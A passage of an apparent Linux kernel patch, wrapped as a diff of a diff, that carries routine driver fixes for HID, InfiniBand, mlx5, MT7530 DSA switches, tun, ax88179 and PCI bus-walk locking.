+-				USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2) },
++				USB_DEVICE_ID_GENIUS_GX_IMPERATOR) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_EASYPEN_M610X) },
++				USB_DEVICE_ID_KYE_EASYPEN_I405X) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_EASYPEN_M406XE) },
++				USB_DEVICE_ID_KYE_MOUSEPEN_I608X) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_GENIUS_GILA_GAMING_MOUSE) },
++				USB_DEVICE_ID_KYE_EASYPEN_M610X) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_GENIUS_GX_IMPERATOR) },
++				USB_DEVICE_ID_KYE_PENSKETCH_M912) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_GENIUS_MANTICORE) },
++				USB_DEVICE_ID_KYE_EASYPEN_M406XE) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_PENSKETCH_M912) },
++				USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2) },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(hid, kye_devices);
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 60884066362a1..debc49272a5c0 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -107,12 +107,12 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_HP, USB_PRODUCT_ID_HP_PIXART_OEM_USB_OPTICAL_MOUSE_1f4a), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_IDEACOM, USB_DEVICE_ID_IDEACOM_IDC6680), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_INNOMEDIA, USB_DEVICE_ID_INNEX_GENESIS_ATARI), HID_QUIRK_MULTI_INPUT },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_EASYPEN_M610X), HID_QUIRK_MULTI_INPUT },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_PIXART_USB_OPTICAL_MOUSE_ID2), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_MOUSEPEN_I608X), HID_QUIRK_MULTI_INPUT },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2), HID_QUIRK_MULTI_INPUT },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_EASYPEN_M610X), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_PENSKETCH_M912), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_EASYPEN_M406XE), HID_QUIRK_MULTI_INPUT },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_PIXART_USB_OPTICAL_MOUSE_ID2), HID_QUIRK_ALWAYS_POLL },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_LENOVO, USB_DEVICE_ID_LENOVO_OPTICAL_USB_MOUSE_600E), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_LENOVO, USB_DEVICE_ID_LENOVO_PIXART_USB_MOUSE_608D), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_LENOVO, USB_DEVICE_ID_LENOVO_PIXART_USB_MOUSE_6019), HID_QUIRK_ALWAYS_POLL },
+diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
+index 462a10d6a5762..950fe205995b7 100644
+--- a/drivers/infiniband/core/cm.c
++++ b/drivers/infiniband/core/cm.c
+@@ -1026,23 +1026,26 @@ static void cm_reset_to_idle(struct cm_id_private *cm_id_priv)
+ 	}
+ }
+ 
+-static noinline void cm_destroy_id_wait_timeout(struct ib_cm_id *cm_id)
++static noinline void cm_destroy_id_wait_timeout(struct ib_cm_id *cm_id,
++						enum ib_cm_state old_state)
+ {
+ 	struct cm_id_private *cm_id_priv;
+ 
+ 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
+-	pr_err("%s: cm_id=%p timed out. state=%d refcnt=%d\n", __func__,
+-	       cm_id, cm_id->state, refcount_read(&cm_id_priv->refcount));
++	pr_err("%s: cm_id=%p timed out. state %d -> %d, refcnt=%d\n", __func__,
++	       cm_id, old_state, cm_id->state, refcount_read(&cm_id_priv->refcount));
+ }
+ 
+ static void cm_destroy_id(struct ib_cm_id *cm_id, int err)
+ {
+ 	struct cm_id_private *cm_id_priv;
++	enum ib_cm_state old_state;
+ 	struct cm_work *work;
+ 	int ret;
+ 
+ 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
+ 	spin_lock_irq(&cm_id_priv->lock);
++	old_state = cm_id->state;
+ retest:
+ 	switch (cm_id->state) {
+ 	case IB_CM_LISTEN:
+@@ -1151,7 +1154,7 @@ static void cm_destroy_id(struct ib_cm_id *cm_id, int err)
+ 						  msecs_to_jiffies(
+ 						  CM_DESTROY_ID_WAIT_TIMEOUT));
+ 		if (!ret) /* timeout happened */
+-			cm_destroy_id_wait_timeout(cm_id);
++			cm_destroy_id_wait_timeout(cm_id, old_state);
+ 	} while (!ret);
+ 
+ 	while ((work = cm_dequeue_work(cm_id_priv)) != NULL)
+diff --git a/drivers/infiniband/hw/mlx5/mad.c b/drivers/infiniband/hw/mlx5/mad.c
+index 9c8a7b206dcf4..e61efed320f11 100644
+--- a/drivers/infiniband/hw/mlx5/mad.c
++++ b/drivers/infiniband/hw/mlx5/mad.c
+@@ -188,7 +188,8 @@ static int process_pma_cmd(struct mlx5_ib_dev *dev, u32 port_num,
+ 		mdev = dev->mdev;
+ 		mdev_port_num = 1;
+ 	}
+-	if (MLX5_CAP_GEN(dev->mdev, num_ports) == 1) {
++	if (MLX5_CAP_GEN(dev->mdev, num_ports) == 1 &&
++	    !mlx5_core_mp_enabled(mdev)) {
+ 		/* set local port to one for Function-Per-Port HCA. */
+ 		mdev = dev->mdev;
+ 		mdev_port_num = 1;
+diff --git a/drivers/infiniband/sw/rxe/rxe.c b/drivers/infiniband/sw/rxe/rxe.c
+index 51daac5c4feb7..be3ddfbf3cae3 100644
+--- a/drivers/infiniband/sw/rxe/rxe.c
++++ b/drivers/infiniband/sw/rxe/rxe.c
+@@ -33,6 +33,8 @@ void rxe_dealloc(struct ib_device *ib_dev)
+ 
+ 	if (rxe->tfm)
+ 		crypto_free_shash(rxe->tfm);
++
++	mutex_destroy(&rxe->usdev_lock);
+ }
+ 
+ /* initialize rxe device parameters */
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index f8219cbd2c7ce..a617f64a351dc 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -116,7 +116,7 @@ static const struct pci_device_id mei_me_pci_tbl[] = {
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ADP_P, MEI_ME_PCH15_CFG)},
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ADP_N, MEI_ME_PCH15_CFG)},
+ 
+-	{MEI_PCI_DEVICE(MEI_DEV_ID_RPL_S, MEI_ME_PCH15_CFG)},
++	{MEI_PCI_DEVICE(MEI_DEV_ID_RPL_S, MEI_ME_PCH15_SPS_CFG)},
+ 
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_MTL_M, MEI_ME_PCH15_CFG)},
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_S, MEI_ME_PCH15_CFG)},
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index d4515c19a5f34..1aba0cf38630f 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -419,6 +419,20 @@ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ 	core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
+ }
+ 
++/* If port 6 is available as a CPU port, always prefer that as the default,
++ * otherwise don't care.
++ */
++static struct dsa_port *
++mt753x_preferred_default_local_cpu_port(struct dsa_switch *ds)
++{
++	struct dsa_port *cpu_dp = dsa_to_port(ds, 6);
++
++	if (dsa_port_is_cpu(cpu_dp))
++		return cpu_dp;
++
++	return NULL;
++}
++
+ /* Setup port 6 interface mode and TRGMII TX circuit */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+@@ -1236,6 +1250,13 @@ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ 	if (priv->id == ID_MT7530 || priv->id == ID_MT7621)
+ 		mt7530_rmw(priv, MT7530_MFC, CPU_MASK, CPU_EN | CPU_PORT(port));
+ 
++	/* Add the CPU port to the CPU port bitmap for MT7531. Trapped frames
++	 * will be forwarded to the CPU port that is affine to the inbound user
++	 * port.
++	 */
++	if (priv->id == ID_MT7531)
++		mt7530_set(priv, MT7531_CFC, MT7531_CPU_PMAP(BIT(port)));
++
+ 	/* CPU port gets connected to all user ports of
+ 	 * the switch.
+ 	 */
+@@ -2413,8 +2434,6 @@ mt7530_setup(struct dsa_switch *ds)
+ 		     SYS_CTRL_PHY_RST | SYS_CTRL_SW_RST |
+ 		     SYS_CTRL_REG_RST);
+ 
+-	mt7530_pll_setup(priv);
+-
+ 	/* Lower Tx driving for TRGMII path */
+ 	for (i = 0; i < NUM_TRGMII_CTRL; i++)
+ 		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+@@ -2432,6 +2451,9 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	priv->p6_interface = PHY_INTERFACE_MODE_NA;
+ 
++	if ((val & HWTRAP_XTAL_MASK) == HWTRAP_XTAL_40MHZ)
++		mt7530_pll_setup(priv);
++
+ 	mt753x_trap_frames(priv);
+ 
+ 	/* Enable and reset MIB counters */
+@@ -2461,6 +2483,9 @@ mt7530_setup(struct dsa_switch *ds)
+ 			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
+ 	}
+ 
++	/* Allow mirroring frames received on the local port (monitor port). */
++	mt7530_set(priv, MT753X_AGC, LOCAL_EN);
++
+ 	/* Setup VLAN ID 0 for VLAN-unaware bridges */
+ 	ret = mt7530_setup_vlan0(priv);
+ 	if (ret)
+@@ -2531,16 +2556,8 @@ static int
+ mt7531_setup_common(struct dsa_switch *ds)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+-	struct dsa_port *cpu_dp;
+ 	int ret, i;
+ 
+-	/* BPDU to CPU port */
+-	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
+-		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
+-			   BIT(cpu_dp->index));
+-		break;
+-	}
+-
+ 	mt753x_trap_frames(priv);
+ 
+ 	/* Enable and reset MIB counters */
+@@ -2577,6 +2594,9 @@ mt7531_setup_common(struct dsa_switch *ds)
+ 			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
+ 	}
+ 
++	/* Allow mirroring frames received on the local port (monitor port). */
++	mt7530_set(priv, MT753X_AGC, LOCAL_EN);
++
+ 	/* Flush the FDB table */
+ 	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
+ 	if (ret < 0)
+@@ -2655,18 +2675,25 @@ mt7531_setup(struct dsa_switch *ds)
+ 	priv->p5_interface = PHY_INTERFACE_MODE_NA;
+ 	priv->p6_interface = PHY_INTERFACE_MODE_NA;
+ 
+-	/* Enable PHY core PLL, since phy_device has not yet been created
+-	 * provided for phy_[read,write]_mmd_indirect is called, we provide
+-	 * our own mt7531_ind_mmd_phy_[read,write] to complete this
+-	 * function.
++	/* Enable Energy-Efficient Ethernet (EEE) and PHY core PLL, since
++	 * phy_device has not yet been created provided for
++	 * phy_[read,write]_mmd_indirect is called, we provide our own
++	 * mt7531_ind_mmd_phy_[read,write] to complete this function.
+ 	 */
+ 	val = mt7531_ind_c45_phy_read(priv, MT753X_CTRL_PHY_ADDR,
+ 				      MDIO_MMD_VEND2, CORE_PLL_GROUP4);
+-	val |= MT7531_PHY_PLL_BYPASS_MODE;
++	val |= MT7531_RG_SYSPLL_DMY2 | MT7531_PHY_PLL_BYPASS_MODE;
+ 	val &= ~MT7531_PHY_PLL_OFF;
+ 	mt7531_ind_c45_phy_write(priv, MT753X_CTRL_PHY_ADDR, MDIO_MMD_VEND2,
+ 				 CORE_PLL_GROUP4, val);
+ 
++	/* Disable EEE advertisement on the switch PHYs. */
++	for (i = MT753X_CTRL_PHY_ADDR;
++	     i < MT753X_CTRL_PHY_ADDR + MT7530_NUM_PHYS; i++) {
++		mt7531_ind_c45_phy_write(priv, i, MDIO_MMD_AN, MDIO_AN_EEE_ADV,
++					 0);
++	}
++
+ 	mt7531_setup_common(ds);
+ 
+ 	/* Setup VLAN ID 0 for VLAN-unaware bridges */
+@@ -3400,6 +3427,7 @@ static int mt753x_set_mac_eee(struct dsa_switch *ds, int port,
+ static const struct dsa_switch_ops mt7530_switch_ops = {
+ 	.get_tag_protocol	= mtk_get_tag_protocol,
+ 	.setup			= mt753x_setup,
++	.preferred_default_local_cpu_port = mt753x_preferred_default_local_cpu_port,
+ 	.get_strings		= mt7530_get_strings,
+ 	.get_ethtool_stats	= mt7530_get_ethtool_stats,
+ 	.get_sset_count		= mt7530_get_sset_count,
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index 2d1ea390f05ab..6441e8d7f05d9 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -31,6 +31,10 @@ enum mt753x_id {
+ #define SYSC_REG_RSTCTRL		0x34
+ #define  RESET_MCM			BIT(2)
+ 
++/* Register for ARL global control */
++#define MT753X_AGC			0xc
++#define  LOCAL_EN			BIT(7)
++
+ /* Registers to mac forward control for unknown frames */
+ #define MT7530_MFC			0x10
+ #define  BC_FFP(x)			(((x) & 0xff) << 24)
+@@ -53,6 +57,7 @@ enum mt753x_id {
+ #define  MT7531_MIRROR_PORT_GET(x)	(((x) >> 16) & MIRROR_MASK)
+ #define  MT7531_MIRROR_PORT_SET(x)	(((x) & MIRROR_MASK) << 16)
+ #define  MT7531_CPU_PMAP_MASK		GENMASK(7, 0)
++#define  MT7531_CPU_PMAP(x)		FIELD_PREP(MT7531_CPU_PMAP_MASK, x)
+ 
+ #define MT753X_MIRROR_REG(id)		(((id) == ID_MT7531) ? \
+ 					 MT7531_CFC : MT7530_MFC)
+@@ -668,6 +673,7 @@ enum mt7531_clk_skew {
+ #define  RG_SYSPLL_DDSFBK_EN		BIT(12)
+ #define  RG_SYSPLL_BIAS_EN		BIT(11)
+ #define  RG_SYSPLL_BIAS_LPF_EN		BIT(10)
++#define  MT7531_RG_SYSPLL_DMY2		BIT(6)
+ #define  MT7531_PHY_PLL_OFF		BIT(5)
+ #define  MT7531_PHY_PLL_BYPASS_MODE	BIT(4)
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index 652ef09eeb305..ec6628aacc13b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+@@ -663,7 +663,7 @@ ice_eswitch_add_tc_fltr(struct ice_vsi *vsi, struct ice_tc_flower_fltr *fltr)
+ 	int ret;
+ 	int i;
+ 
+-	if (!flags || (flags & ICE_TC_FLWR_FIELD_ENC_SRC_L4_PORT)) {
++	if (flags & ICE_TC_FLWR_FIELD_ENC_SRC_L4_PORT) {
+ 		NL_SET_ERR_MSG_MOD(fltr->extack, "Unsupported encap field(s)");
+ 		return -EOPNOTSUPP;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+index 58eacba6de8cd..ad51edf553185 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+@@ -45,6 +45,10 @@ struct arfs_table {
+ 	struct hlist_head	 rules_hash[ARFS_HASH_SIZE];
+ };
+ 
++enum {
++	MLX5E_ARFS_STATE_ENABLED,
++};
++
+ enum arfs_type {
+ 	ARFS_IPV4_TCP,
+ 	ARFS_IPV6_TCP,
+@@ -60,6 +64,7 @@ struct mlx5e_arfs_tables {
+ 	struct list_head               rules;
+ 	int                            last_filter_id;
+ 	struct workqueue_struct        *wq;
++	unsigned long                  state;
+ };
+ 
+ struct arfs_tuple {
+@@ -170,6 +175,8 @@ int mlx5e_arfs_enable(struct mlx5e_flow_steering *fs)
+ 			return err;
+ 		}
+ 	}
++	set_bit(MLX5E_ARFS_STATE_ENABLED, &arfs->state);
++
+ 	return 0;
+ }
+ 
+@@ -454,6 +461,8 @@ static void arfs_del_rules(struct mlx5e_flow_steering *fs)
+ 	int i;
+ 	int j;
+ 
++	clear_bit(MLX5E_ARFS_STATE_ENABLED, &arfs->state);
++
+ 	spin_lock_bh(&arfs->arfs_lock);
+ 	mlx5e_for_each_arfs_rule(rule, htmp, arfs->arfs_tables, i, j) {
+ 		hlist_del_init(&rule->hlist);
+@@ -621,17 +630,8 @@ static void arfs_handle_work(struct work_struct *work)
+ 	struct mlx5_flow_handle *rule;
+ 
+ 	arfs = mlx5e_fs_get_arfs(priv->fs);
+-	mutex_lock(&priv->state_lock);
+-	if (!test_bit(MLX5E_STATE_OPENED, &priv->state)) {
+-		spin_lock_bh(&arfs->arfs_lock);
+-		hlist_del(&arfs_rule->hlist);
+-		spin_unlock_bh(&arfs->arfs_lock);
+-
+-		mutex_unlock(&priv->state_lock);
+-		kfree(arfs_rule);
+-		goto out;
+-	}
+-	mutex_unlock(&priv->state_lock);
++	if (!test_bit(MLX5E_ARFS_STATE_ENABLED, &arfs->state))
++		return;
+ 
+ 	if (!arfs_rule->rule) {
+ 		rule = arfs_add_rule(priv, arfs_rule);
+@@ -744,6 +744,11 @@ int mlx5e_rx_flow_steer(struct net_device *dev, const struct sk_buff *skb,
+ 		return -EPROTONOSUPPORT;
+ 
+ 	spin_lock_bh(&arfs->arfs_lock);
++	if (!test_bit(MLX5E_ARFS_STATE_ENABLED, &arfs->state)) {
++		spin_unlock_bh(&arfs->arfs_lock);
++		return -EPERM;
++	}
++
+ 	arfs_rule = arfs_find_rule(arfs_t, &fk);
+ 	if (arfs_rule) {
+ 		if (arfs_rule->rxq == rxq_index) {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+index ad32b80e85018..01c0e1ee918d8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+@@ -679,8 +679,10 @@ static int mlx5_deactivate_lag(struct mlx5_lag *ldev)
+ 		return err;
+ 	}
+ 
+-	if (test_bit(MLX5_LAG_MODE_FLAG_HASH_BASED, &flags))
++	if (test_bit(MLX5_LAG_MODE_FLAG_HASH_BASED, &flags)) {
+ 		mlx5_lag_port_sel_destroy(ldev);
++		ldev->buckets = 1;
++	}
+ 	if (mlx5_lag_has_drop_rule(ldev))
+ 		mlx5_lag_drop_rule_cleanup(ldev);
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 76fabeae512db..33df06a2de13a 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2549,6 +2549,8 @@ static void am65_cpsw_unregister_devlink(struct am65_cpsw_common *common)
+ 
+ static int am65_cpsw_nuss_register_ndevs(struct am65_cpsw_common *common)
+ {
++	struct am65_cpsw_rx_chn *rx_chan = &common->rx_chns;
++	struct am65_cpsw_tx_chn *tx_chan = common->tx_chns;
+ 	struct device *dev = common->dev;
+ 	struct devlink_port *dl_port;
+ 	struct am65_cpsw_port *port;
+@@ -2567,6 +2569,22 @@ static int am65_cpsw_nuss_register_ndevs(struct am65_cpsw_common *common)
+ 		return ret;
+ 	}
+ 
++	/* The DMA Channels are not guaranteed to be in a clean state.
++	 * Reset and disable them to ensure that they are back to the
++	 * clean state and ready to be used.
++	 */
++	for (i = 0; i < common->tx_ch_num; i++) {
++		k3_udma_glue_reset_tx_chn(tx_chan[i].tx_chn, &tx_chan[i],
++					  am65_cpsw_nuss_tx_cleanup);
++		k3_udma_glue_disable_tx_chn(tx_chan[i].tx_chn);
++	}
++
++	for (i = 0; i < AM65_CPSW_MAX_RX_FLOWS; i++)
++		k3_udma_glue_reset_rx_chn(rx_chan->rx_chn, i, rx_chan,
++					  am65_cpsw_nuss_rx_cleanup, !!i);
++
++	k3_udma_glue_disable_rx_chn(rx_chan->rx_chn);
++
+ 	ret = am65_cpsw_nuss_register_devlink(common);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 922d6f16d99d1..4af1ba5d074c0 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -2121,14 +2121,16 @@ static ssize_t tun_put_user(struct tun_struct *tun,
+ 					    tun_is_little_endian(tun), true,
+ 					    vlan_hlen)) {
+ 			struct skb_shared_info *sinfo = skb_shinfo(skb);
+-			pr_err("unexpected GSO type: "
+-			       "0x%x, gso_size %d, hdr_len %d\n",
+-			       sinfo->gso_type, tun16_to_cpu(tun, gso.gso_size),
+-			       tun16_to_cpu(tun, gso.hdr_len));
+-			print_hex_dump(KERN_ERR, "tun: ",
+-				       DUMP_PREFIX_NONE,
+-				       16, 1, skb->head,
+-				       min((int)tun16_to_cpu(tun, gso.hdr_len), 64), true);
++
++			if (net_ratelimit()) {
++				netdev_err(tun->dev, "unexpected GSO type: 0x%x, gso_size %d, hdr_len %d\n",
++					   sinfo->gso_type, tun16_to_cpu(tun, gso.gso_size),
++					   tun16_to_cpu(tun, gso.hdr_len));
++				print_hex_dump(KERN_ERR, "tun: ",
++					       DUMP_PREFIX_NONE,
++					       16, 1, skb->head,
++					       min((int)tun16_to_cpu(tun, gso.hdr_len), 64), true);
++			}
+ 			WARN_ON_ONCE(1);
+ 			return -EINVAL;
+ 		}
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index e0e9b4c53cb02..3078511f76083 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1317,6 +1317,8 @@ static int ax88179_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	netif_set_tso_max_size(dev->net, 16384);
+ 
++	ax88179_reset(dev);
++
+ 	return 0;
+ }
+ 
+@@ -1695,7 +1697,6 @@ static const struct driver_info ax88179_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+@@ -1708,7 +1709,6 @@ static const struct driver_info ax88178a_info = {
+ 	.unbind = ax88179_unbind,
+ 	.status = ax88179_status,
+ 	.link_reset = ax88179_link_reset,
+-	.reset = ax88179_reset,
+ 	.stop = ax88179_stop,
+ 	.flags = FLAG_ETHER | FLAG_FRAMING_AX,
+ 	.rx_fixup = ax88179_rx_fixup,
+diff --git a/drivers/pci/bus.c b/drivers/pci/bus.c
+index feafa378bf8ea..aa2fba1c0f567 100644
+--- a/drivers/pci/bus.c
++++ b/drivers/pci/bus.c
+@@ -379,21 +379,8 @@ void pci_bus_add_devices(const struct pci_bus *bus)
+ }
+ EXPORT_SYMBOL(pci_bus_add_devices);
+ 
+-/** pci_walk_bus - walk devices on/under bus, calling callback.
+- *  @top      bus whose devices should be walked
+- *  @cb       callback to be called for each device found
+- *  @userdata arbitrary pointer to be passed to callback.
+- *
+- *  Walk the given bus, including any bridged devices
+- *  on buses under this bus.  Call the provided callback
+- *  on each device found.
+- *
+- *  We check the return of @cb each time. If it returns anything
+- *  other than 0, we break out.
+- *
+- */
+-void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
+-		  void *userdata)
++static void __pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
++			   void *userdata, bool locked)
+ {
+ 	struct pci_dev *dev;
+ 	struct pci_bus *bus;
+@@ -401,7 +388,8 @@ void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
+ 	int retval;
+ 
+ 	bus = top;
+-	down_read(&pci_bus_sem);
++	if (!locked)
++		down_read(&pci_bus_sem);
+ 	next = top->devices.next;
+ 	for (;;) {
+ 		if (next == &bus->devices) {
+@@ -424,10 +412,37 @@ void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
+ 		if (retval)
+ 			break;
+ 	}
+-	up_read(&pci_bus_sem);
++	if (!locked)
++		up_read(&pci_bus_sem);
++}
++
++/**
++ *  pci_walk_bus - walk devices on/under bus, calling callback.
++ *  @top: bus whose devices should be walked
++ *  @cb: callback to be called for each device found
++ *  @userdata: arbitrary pointer to be passed to callback
++ *
++ *  Walk the given bus, including any bridged devices
++ *  on buses under this bus.  Call the provided callback
++ *  on each device found.
++ *
++ *  We check the return of @cb each time. If it returns anything
++ *  other than 0, we break out.
++ */
++void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *), void *userdata)
++{
++	__pci_walk_bus(top, cb, userdata, false);
+ }
+ EXPORT_SYMBOL_GPL(pci_walk_bus);
+ 
++void pci_walk_bus_locked(struct pci_bus *top, int (*cb)(struct pci_dev *, void *), void *userdata)
++{
++	lockdep_assert_held(&pci_bus_sem);
++
++	__pci_walk_bus(top, cb, userdata, true);
++}
++EXPORT_SYMBOL_GPL(pci_walk_bus_locked);
++
+ struct pci_bus *pci_bus_get(struct pci_bus *bus)
+ {
+ 	if (bus)
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 5368a37154cf9..67956bfebf879 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -1258,6 +1258,7 @@ int pci_power_up(struct pci_dev *dev)
+ /**
+  * pci_set_full_power_state - Put a PCI device into D0 and update its state
+  * @dev: PCI device to power up
++ * @locked: whether pci_bus_sem is held
+  *
+  * Call pci_power_up() to put @dev into D0, read from its PCI_PM_CTRL register
+  * to confirm the state change, restore its BARs if they might be lost and
+@@ -1267,7 +1268,7 @@ int pci_power_up(struct pci_dev *dev)
+  * to D0, it is more efficient to use pci_power_up() directly instead of this
+  * function.
+  */
+-static int pci_set_full_power_state(struct pci_dev *dev)
++static int pci_set_full_power_state(struct pci_dev *dev, bool locked)
+ {
+ 	u16 pmcsr;
+ 	int ret;
+@@ -1303,7 +1304,7 @@ static int pci_set_full_power_state(struct pci_dev *dev)
+ 	}
+ 
+ 	if (dev->bus->self)
+-		pcie_aspm_pm_state_change(dev->bus->self);
++		pcie_aspm_pm_state_change(dev->bus->self, locked);
+ 
+ 	return 0;
+ }
+@@ -1332,10 +1333,22 @@ void pci_bus_set_current_state(struct pci_bus *bus, pci_power_t state)
+ 		pci_walk_bus(bus, __pci_dev_set_current_state, &state);
+ }
+ 
++static void __pci_bus_set_current_state(struct pci_bus *bus, pci_power_t state, bool locked)
++{
++	if (!bus)
++		return;
++
++	if (locked)
++		pci_walk_bus_locked(bus, __pci_dev_set_current_state, &state);
++	else
++		pci_walk_bus(bus, __pci_dev_set_current_state, &state);
++}
++
+ /**
+  * pci_set_low_power_state - Put a PCI device into a low-power state.
+  * @dev: PCI device to handle.
+  * @state: PCI power state (D1, D2, D3hot) to put the device into.
++ * @locked: whether pci_bus_sem is held
+  *
+  * Use the device's PCI_PM_CTRL register to put it into a low-power state.
+  *
+@@ -1346,7 +1359,7 @@ void pci_bus_set_current_state(struct pci_bus *bus, pci_power_t state)
+  * 0 if device already is in the requested state.
+  * 0 if device's power state has been successfully changed.
+  */
+-static int pci_set_low_power_state(struct pci_dev *dev, pci_power_t state)
++static int pci_set_low_power_state(struct pci_dev *dev, pci_power_t state, bool locked)
+ {
+ 	u16 pmcsr;
+ 
+@@ -1400,29 +1413,12 @@ static int pci_set_low_power_state(struct pci_dev *dev, pci_power_t state)
+ 				     pci_power_name(state));
+ 
+ 	if (dev->bus->self)
+-		pcie_aspm_pm_state_change(dev->bus->self);
++		pcie_aspm_pm_state_change(dev->bus->self, locked);
+ 
+ 	return 0;
+ }
+ 
+-/**
+- * pci_set_power_state - Set the power state of a PCI device
+- * @dev: PCI device to handle.
+- * @state: PCI power state (D0, D1, D2, D3hot) to put the device into.
+- *
+- * Transition a device to a new power state, using the platform firmware and/or
+- * the device's PCI PM registers.
+- *
+- * RETURN VALUE:
